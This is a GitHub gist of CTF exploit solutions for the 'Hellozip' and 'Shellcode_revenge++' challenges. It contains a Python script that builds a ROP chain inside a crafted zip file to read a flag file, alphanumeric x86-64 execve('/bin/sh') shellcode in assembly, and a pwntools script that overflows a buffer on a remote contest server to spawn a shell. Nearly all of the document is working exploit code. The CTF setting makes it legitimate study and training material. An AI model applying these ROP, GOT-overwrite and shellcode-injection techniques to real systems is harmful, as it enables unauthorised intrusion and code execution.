Last active
December 18, 2017 03:07
-
-
Save cubarco/73e3fdb971c432f26308e3a8b5fc265b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Shellcode_revenge++, Hellozip |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# coding=utf8 | |
from pwn import p32, p16 | |
pop_2 = 0x8048F9A | |
pop_1 = 0x8048F9B | |
add_ptrebp_bl = 0x080488ac | |
pop_ebp = 0x08048898 | |
pop_ebx = 0x080484a1 | |
ret = 0x8048B87 | |
readable_addr = ret | |
add_eax_ptrebx = 0x080492bb | |
string_buf = 0x804B064 | |
write_plt = 0x8048550 | |
write_got = 0x804B030 | |
rop_chain = ( | |
# I wrote a execve version of exp, but it *dropped EGID* in the server | |
# whatever command it executed. Although it worked fine in my local | |
# machine. I don't know why, it's really werid. | |
# So I tried to do all the open-read-write stuffs in one ROP-chain. | |
# The main goal is to open('flag', 0) and sendfile(1, 3, 0, 100) | |
p32(pop_1) + p32(readable_addr) + # pop some corrupted stack | |
# craft open() on write_got | |
# I could just find the gadget to ADD byte by byte. It's add_ptrebp_bl, go | |
# check about that. | |
p32(pop_ebx) + p32(0x80) + | |
p32(pop_ebp) + p32(write_got + 0x3d) + | |
p32(add_ptrebp_bl) + | |
p32(pop_ebx) + p32(0xfc) + | |
p32(pop_ebp) + p32(write_got + 1 + 0x3d) + | |
p32(add_ptrebp_bl) + | |
# prepare 'flag' string | |
p32(pop_ebx) + p32(ord('f')) + | |
p32(pop_ebp) + p32(string_buf + 0x3d) + | |
p32(add_ptrebp_bl) + | |
p32(pop_ebx) + p32(ord('l')) + | |
p32(pop_ebp) + p32(string_buf + 1 + 0x3d) + | |
p32(add_ptrebp_bl) + | |
p32(pop_ebx) + p32(ord('a')) + | |
p32(pop_ebp) + p32(string_buf + 2 + 0x3d) + | |
p32(add_ptrebp_bl) + | |
p32(pop_ebx) + p32(ord('g')) + | |
p32(pop_ebp) + p32(string_buf + 3 + 0x3d) + | |
p32(add_ptrebp_bl) + | |
p32(pop_ebx) + p32(ord('\x00')) + | |
p32(pop_ebp) + p32(string_buf + 4 + 0x3d) + | |
p32(add_ptrebp_bl) + | |
# now open('flag', 0), and the returned file descriptor should be 3 | |
p32(write_plt) + p32(pop_2) + p32(string_buf) + p32(0) + | |
# craft sendfile() on write_got. FYI, it's open() in write_got now. | |
p32(pop_ebx) + p32(0x50) + | |
p32(pop_ebp) + p32(write_got + 0x3d) + | |
p32(add_ptrebp_bl) + | |
p32(pop_ebx) + p32(0x7b) + | |
p32(pop_ebp) + p32(write_got + 1 + 0x3d) + | |
p32(add_ptrebp_bl) + | |
# maybe a carry bit will be triggered in previous operation, about | |
# 50% possibility. It's okay to ignore that. | |
# finally sendfile(1, 3, 0, 100) | |
p32(write_plt) + p32(0xdeadbeef) + p32(1) + p32(3) + p32(0) + p32(100) | |
) | |
payload = '\x00' * 276 + rop_chain | |
# Create template.zip with: | |
# with ZipFile('template.zip', 'w') as f: | |
# f.write('emptyfile', 'a') | |
template_zip_buf = '504b0304140000000000517a904b0000000000000000000000000100000061504b01021403140000000000517a904b000000000000000000000000010000000000000000000000a4810000000061504b050600000000010001002f0000001f0000000000'.decode('hex') | |
expzip_buf = \ | |
template_zip_buf[:0x3b] + \ | |
p16(len(payload)) + \ | |
template_zip_buf[0x3d:0x4d] + \ | |
payload + \ | |
template_zip_buf[0x4e:] | |
with open('exp.zip', 'w') as f: | |
f.write(expzip_buf) | |
# Now scp exp.zip to the /tmp dir in server, | |
# and run 'cd /home/hellozip; ./hellozip < /tmp/exp.zip' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Slightly modified from: https://www.exploit-db.com/exploits/35205/ | |
# Assembled (56 bytes): | |
# h/A//XH5PQO/P^hj5XVX1Fm1FuH3FqPTj0X40PP4u4NZ4jWSEW18EF0V | |
# | |
# Assembly: | |
# user@host $ as binsh.s -o binsh.o ; strings binsh.o | |
.section .data | |
.section .text | |
.globl _start | |
_start: | |
push $0x2f2f412f | |
pop %rax | |
xor $0x2f4f5150, %rax # RAX becomes 0x60107f. it's close to the buffer of 'name'. use it as the base of shellcode | |
push %rax | |
pop %rsi # Make use of '^', AKA pop %rsi | |
prepare_key: # "hj5XVX" | |
# put the xor key into %eax | |
push $0x5658356a # 'hj5XV' pushed backwards because x86 stack. | |
pop %rax # 'X' | |
decode_encoded_code: # "1FK" | |
#xor %eax, 0x4b(%rsi) # '1FK' encoded_code ; pops & syscall decoded | |
xor %eax, 0x6d(%rsi) # '1FK' encoded_code ; pops & syscall decoded | |
decode_encoded_data: # "1FSH3FO" | |
xor %eax, 0x75(%rsi) # '1FS' encoded_data + 4 ; "/sh\0" decoded | |
xor 0x71(%rsi), %rax # 'H3FO' encoded_data ; "/bin/sh\0" now in %rax | |
begin_stack_setup: # "PT" | |
push %rax # 'P' push "/bin/sh\0" | |
push %rsp # 'T' push pointer to /bin/sh | |
zero_rax: # "j0X40" | |
# xor %rax, %rax | |
push $0x30 # 'j0' | |
pop %rax # 'X' | |
xor $0x30, %al # '40' %rax is NULL | |
end_stack_setup: # "PP" | |
push %rax # 'P' push NULL | |
push %rax # 'P' push NULL | |
mov_3b_al: # "4u4N" | |
# mov $0x3b, %al | |
xor $0x75, %al # '4u' | |
xor $0x4e, %al # '4N' %al = 0x4e xor 0x75 = $0x3b | |
# this is for syscall ^ | |
begin_stack_run: # "Z" | |
pop %rdx # 'Z' mov $0x00, %rdx ; %rdx = NULL | |
encoded_code: # "4jWS" | |
# 0x34 0x6a 0x57 0x53 | |
# AFTER XOR MAGIC: | |
.byte 0x34 # "\x5e" pop %rsi ; %rsi = NULL | |
.byte 0x6a # "\x5f" pop %rdi ; %rdi = pointer to "/bin/sh\0" | |
.byte 0x57 # "\x0f" | |
.byte 0x53 # "\x05" syscall ; execve("/bin/sh\0",NULL,NULL); | |
# syscall(%rax) = function(%rdi,%rsi,%rdx); | |
# syscall(0x3b) = execve("/bin/sh\0",NULL,NULL); | |
encoded_data: # "EW18EF0V" turns into "/bin/sh\0" | |
# 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56 | |
# AFTER XOR MAGIC: | |
.byte 0x45 # / | |
.byte 0x57 # b | |
.byte 0x31 # i | |
.byte 0x38 # n | |
.byte 0x45 # / | |
.byte 0x46 # s | |
.byte 0x30 # h | |
.byte 0x56 # \0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# coding=utf8 | |
from pwn import remote, process, p64, asm | |
# p = process('./shellcode_revenge++') | |
p = remote('shellcode-revenge.grandprix.whitehatvn.com', 10203) | |
shellcode = 'h/A//XH5PQO/P^hj5XVX1Fm1FuH3FqPTj0X40PP4u4NZ4jWSEW18EF0V' | |
shellcode = shellcode.ljust(80, 'G') # append nop | |
print shellcode | |
name_buf = 0x6010C0 | |
payload = 'a' * 24 + p64(name_buf) | |
p.recvuntil('What\'s your name,') | |
p.send(shellcode) | |
p.recvuntil('messege for me!') | |
p.sendline(payload) | |
p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment